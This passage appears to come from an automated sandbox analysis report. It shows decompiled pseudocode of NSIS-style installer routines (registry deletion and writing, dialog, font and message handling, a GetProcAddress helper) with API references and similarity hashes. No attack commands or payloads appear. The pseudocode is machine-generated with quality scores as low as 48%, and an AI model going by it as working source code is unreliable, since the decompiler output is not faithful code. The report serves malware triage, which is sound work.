									__eax = E6E551510(__edx,  *0x6e555074 + ( *(__esi + 0x18) - 1) *  *0x6e55506c * 2 + 0x18, __edx,  *0x6e555074 + ( *(__esi + 0x18) - 1) *  *0x6e55506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E6E5512CC(0x6e555044);
					goto L10;
				}
			}

0x6e552494
0x6e552498
0x6e5524a3
0x6e5524a3
0x6e5524aa
0x6e5524af
0x00000000
0x00000000
0x6e5524b3
0x6e5524b6
0x00000000
0x00000000
0x6e5524bb
0x6e5524c6
0x6e5524d6
0x00000000
0x6e5524cd
0x6e5524cf
0x6e5524e5
0x00000000
0x6e5524e5
0x6e5524bd
0x6e5524bd
0x6e5524e6
0x6e5524e6
0x6e5524e8
0x6e5524ec
0x6e5524ec
0x6e5524ef
0x6e5524ef
0x6e5524f7
0x6e5524ff
0x6e552502
0x6e5525c1
0x6e5525c2
0x6e5525cd
0x6e5525f7
0x6e5525f7
0x6e5525dd
0x6e5525e9
0x6e5525df
0x6e5525df
0x6e5525df
0x00000000
0x6e552508
0x6e552508
0x00000000
0x6e55250f
0x00000000
0x00000000
0x6e552517
0x00000000
0x00000000
0x6e552525
0x6e552527
0x00000000
0x00000000
0x6e552548
0x6e55254e
0x6e552551
0x6e552553
0x6e552563
0x00000000
0x00000000
0x6e552530
0x6e552535
0x6e552538
0x6e552539
0x00000000
0x00000000
0x6e55256f
0x6e552575
0x6e552576
0x6e552579
0x6e55257a
0x6e55257c
0x00000000
0x00000000
0x6e552588
0x6e55258b
0x6e552597
0x6e552599
0x00000000
0x00000000
0x6e5525a5
0x6e5525b1
0x6e5525b4
0x6e5525b6
0x6e5525b9
0x00000000
0x00000000
0x6e552508
0x6e552502
0x6e5524db
0x6e5524e0
0x00000000
0x6e5524e0

APIs

GlobalFree.KERNEL32(00000000), ref: 6E5525C2

Part of subcall function 6E5512CC: lstrcpynW.KERNEL32(00000000,?,6E55137F,00000019,6E5511CA,-000000A0), ref: 6E5512DC

GlobalAlloc.KERNEL32(00000040), ref: 6E552548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E552563

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: a91ebfd8d321cf1b0b6f0a8a84139372b71287f7344f3a57faab7a7fe0330f03
Instruction ID: 39f5351d6d4142a7f47e466bc5450b3385982c96d763005cc3f52a3a5406a78c
Opcode Fuzzy Hash: a91ebfd8d321cf1b0b6f0a8a84139372b71287f7344f3a57faab7a7fe0330f03
Instruction Fuzzy Hash: 4041CEB8008705DFD714DFA9D850A6677F8FB85310F118D1FE54A8B380EB30A965CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068D4(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406544(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E0040644E();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000), ref: 00406743

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: f838b5baf228103f5fd385e630955879067bc70170f13252a29975995c8fe6b2
Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
Opcode Fuzzy Hash: f838b5baf228103f5fd385e630955879067bc70170f13252a29975995c8fe6b2
Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 6E5516BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E5516BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x6e5516d7
0x6e5516e3
0x6e5516f0
0x6e5516f7
0x6e551700
0x6e55170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E5522D8,?,00000808), ref: 6E5516D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E5522D8,?,00000808), ref: 6E5516DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E5522D8,?,00000808), ref: 6E5516F0
GetProcAddress.KERNEL32(6E5522D8,00000000), ref: 6E5516F7
GlobalFree.KERNEL32(00000000), ref: 6E551700

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 21c35ade5ce31267e42244aa3e1e9637bedfdc4b8c0f38505759ee040b1044b2
Instruction ID: 8558f613a440f1328d77198b6f68af85225f8e90bf324c8228f225b75513af2b
Opcode Fuzzy Hash: 21c35ade5ce31267e42244aa3e1e9637bedfdc4b8c0f38505759ee040b1044b2
Instruction Fuzzy Hash: BBF012721066387BDA2016A68C4CC9B7F9CDF8B2F5B120211F619911A08A615C12D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
			}

0x00404d19
0x00404d1e
0x00404d26
0x00404d27
0x00404d34
0x00404d3c
0x00404d3d
0x00404d3f
0x00404d41
0x00404d43
0x00404d46
0x00404d46
0x00404d4d
0x00404d53
0x00404d53
0x00404d5a
0x00404d61
0x00404d64
0x00404d67
0x00404d67
0x00404d6b
0x00404d7b
0x00404d7d
0x00404d80
0x00404d29
0x00404d29
0x00404d30
0x00404d30
0x00404d88
0x00404d93
0x00404da9
0x00404dba
0x00404dd6

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
wsprintfW.USER32 ref: 00404DBA
SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

%u.%u%s%s, xrefs: 00404D9B

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: dd6052bb08b2cf0188f70179b0c63bbafe6d95c304151c4f0e040ce7d30f5014
Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
Opcode Fuzzy Hash: dd6052bb08b2cf0188f70179b0c63bbafe6d95c304151c4f0e040ce7d30f5014
Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5c8 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx50C8.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx50C8.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx50C8.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsx50C8.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
